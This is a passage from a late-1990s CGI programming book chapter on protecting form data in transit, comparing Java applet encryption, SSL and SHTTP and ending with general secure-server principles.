However, how can I prevent someone from intercepting the information
as it goes from the client to the server? Remember how information
moves from the Web browser to the CGI program (as explained in
Chapter 1, "Common Gateway Interface
(CGI)")? Information flows over the network from the browser
to the server first, and then the server passes the information
to the CGI program. This information can be intercepted while
it is moved from the client machine to the server (as shown in
Figure 9.2). Note that in order to protect
the information from being intercepted over the network, the information
must be encrypted between the client and the server. You cannot
implement a CGI-specific encryption scheme unless the client understands
it, as well.
Figure 9.2 : A diagram of the information flow between the client, server, and CGI application.
Java, CGI, and Secure Transactions |
Due to the nature of Web transactions, the only way you could develop and use your own secure transaction protocol using only CGI would be by first encrypting the form information before it is submitted by the browser to the server. The scheme would look like the diagram in Figure 9.3.
Until recently, developing your own secure transaction protocol was an impossible task. Thanks to recent innovations in client-side processing such as Java, such development is now possible.
The idea is to create a Java interface that is a superset of normal HTML forms. When the Java Submit button is selected, the Java applet first encrypts the appropriate values before sending it to the Web server by using the normal POST HTTP request (see Figure 9.4).
Using Java as a client to send and receive encrypted data enables you to create your own customized encryption schemes without requiring a potentially expensive commercial server. For more information on how one might implement such a transaction, refer to Chapter 8, "Client/Server Issues."
|
Figure 9.3 : A secure transaction scheme using only CGI.
Figure 9.4 : An applet sends the form data instead of the browser.
Consequently, securing information over the network requires modifying
the way the browser and the server communicate, something that
cannot be controlled by using CGI. There are currently two major
proposals for encrypted client/server transactions: Secure Sockets
Layer (SSL), proposed by Netscape, and Secure HTTP (SHTTP), proposed
by Enterprise Integrations Technology (EIT). At this point, it
is not clear whether one scheme will become standard; several
companies have adopted both protocols in their servers. Consequently,
it is useful to know how to write CGI programs for both schemes.
SSL is a protocol-independent encryption scheme that provides
channel security between the application layer and transport layer
of a network packet (see Figure 9.5).
In plain English, this means that encrypted transactions are handled
"behind-the-scenes" by the server and are essentially
transparent to the HTML or CGI author.
Figure 9.5 : The SSL protocol providing secure Web transactions.
Because the client and server's network routines handle the encryption,
almost all of your CGI scripts should work without modification
with secure transactions. There is one notable exception. An nph
(no-parse-header) CGI program bypasses the server and communicates
directly with the client. Consequently, nph CGI scripts would
break under secure transactions because the information never
gets encrypted. A notable CGI application that is affected by
this problem is Netscape server-push animations (discussed in
detail in Chapter 14, "Proprietary
Extensions"). I doubt this is a major concern, however, because
it is highly likely that an animation is expendable on a page
for securely transmitting sensitive information.
SHTTP takes a different approach from SSL. It works by extending
the HTTP protocol (the application layer) rather than a lower
layer. Consequently, whereas SSL can be used for all network services,
SHTTP is a Web-specific protocol.
However, this has other benefits. As a superset of HTTP, SHTTP
is backward and forward compatible with HTTP and SHTTP browsers
and servers. In order to use SSL, you must have an SSL-enabled
browser and server. Additionally, SHTTP is a much more flexible
protocol. The server can designate preferred encryption schemes,
for example.
SHTTP transactions depend on additional HTTP headers. Consequently,
if you want your CGI program to take advantage of an SHTTP encrypted
transaction, you need to include the appropriate headers. For
example, instead of simply returning the HTTP header
Content-Type: text/html
you could return
Content-Type: text/html Privacy-Enhancements:
encrypt
When an SHTTP server receives this information from the CGI application,
it will know to encrypt the information before sending it to the
browser. A non-SHTTP browser will just ignore the extra header.
For more information on using SHTTP, refer to the SHTTP specifications
located at <URL:http://www.commerce.net/information/standards/drafts/shttp.txt>.
Security is an all-encompassing thing when you are dealing with
networked applications such as the World Wide Web. Writing secure
CGI applications is not tremendously useful if your Web server
is not securely configured. A properly configured Web server,
on the other hand, can minimize the damage of a badly written
CGI script.
In general, remember the following principles:
- Your programs should do only what you
want them to do, no more.
- Don't reveal any more information about
your server than necessary.
- Minimize the potential damage if someone
successfully breaks into your machine.
- Make sure your applications are robust.
When you are writing CGI programs, be especially wary of the limitations
(or lack thereof) of your programming language and for passing
unsanitized variables to the shell.

Contact
reference@developer.com with questions or comments.
Copyright 1998
EarthWeb Inc., All rights reserved.
PLEASE READ THE ACCEPTABLE USAGE STATEMENT.
Copyright 1998 Macmillan Computer Publishing. All rights reserved.